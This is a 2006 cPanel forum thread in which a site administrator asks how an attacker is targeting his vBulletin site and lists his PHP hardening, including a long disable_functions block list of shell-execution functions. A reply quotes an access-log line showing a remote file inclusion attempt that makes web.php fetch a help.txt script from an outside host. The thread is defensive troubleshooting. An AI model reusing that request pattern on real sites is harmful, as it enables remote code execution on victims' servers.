The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

check log i what is that hacking method

Discussion in 'General Discussion' started by kuwaitnt, Nov 25, 2006.

  1. kuwaitnt

    kuwaitnt Well-Known Member

    Joined:
    Oct 13, 2003
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    6
    hello

    i have strange hacking on my box

    http://3zz.cc/iplog2.txt

    that is log from my web site

    it is on shared server with centos 4.4
    iam run vbulletin last version

    and server is well secure but i don't know what is this hacking method

    can any one help us to prevent is


    i know the hacker is get help.txt file from his web site

    but i don't know where does he put thats file i have check my web site there are no suspension file i check the log i don't know also the name does he request to hack my web site

    i think he can delete, read and change files and folders for my web site and i think he also can control my website from other web site on that server



    notice :

    iam use php4.4.4 with safe_mode and this disable_functions

    phpinfo, mkdir, unlink, symlink, ini_restore, popen, pclose, system, exec, shell_exec, suExec, dl, passthru, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, leak, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, posix_getpwuid, escapeshellcmd, escapeshellarg, fpassthru, psockopen, cmd, backtick, virtual, pcntl_exec , ini_alter, parse_ini_file, show_source, apache_child_terminate, apache_get_modules , apache_get_version , apache_note, openlog, popens, filegetcontents, get_dir, dos_conv, myshellexec, get_current_user, php_uname, fileperms, filegroup, fileowner, getmyuid, getmygid

    i have set allow_url_fopen to off

    and php run with phpsuexec


    i have installed mod_security with accunett rules or others rules i have add it

    i have install rfx network LES

    my system is centos 4.4 with cpanel current version



    i know the person who try to hack me and i know he is get files to my website or other web site on my server then he try hacking
     
  2. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    Looks like a common attack on register_globals using a remote include.
    Check your web.php file at the includet variable. It's probably not properly coded.

    Sat Nov 25 16:21:16 2006 1 91.140.140.49 6038 /home/nokia3/pub62.150.187.89 - - [20/Nov/2006:15:55:14 +0300] "GET /web.php?inludet=http://www.arabdesing.com/help.txt? HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
     
  3. kuwaitnt

    kuwaitnt Well-Known Member

    Joined:
    Oct 13, 2003
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    6
    root@dnsbox [/tmp]# php -i | grep global
    register_globals => Off => Off



    it is off on that server

    but iam unanderstand what is that


    /home/nokia3/public_html/includes/init.php a _ i r nokia3 ftp 1 * c


    there are some thing i think about chown or chmod files or some ftp issue ?


    i realy unknow what he is try to do :(

    as server is realy well secure but iam unanderstand what does he do
     
  4. kuwaitnt

    kuwaitnt Well-Known Member

    Joined:
    Oct 13, 2003
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    6
    hello

    for notice : i have set register_globals off and allow_url_fopen to off

    when iam checking on domlog files i have notice

    he have upload files via web in the past he upload encoded file in cgi-bin folder

    and i need to know what is his method to hack my web sites !! so that i can prevent it

    i think i will made mod_security rules for that request a _ i r nokia3 ftp 1 * c

    but what about user name to how can i made it ??
     
Loading...

Share This Page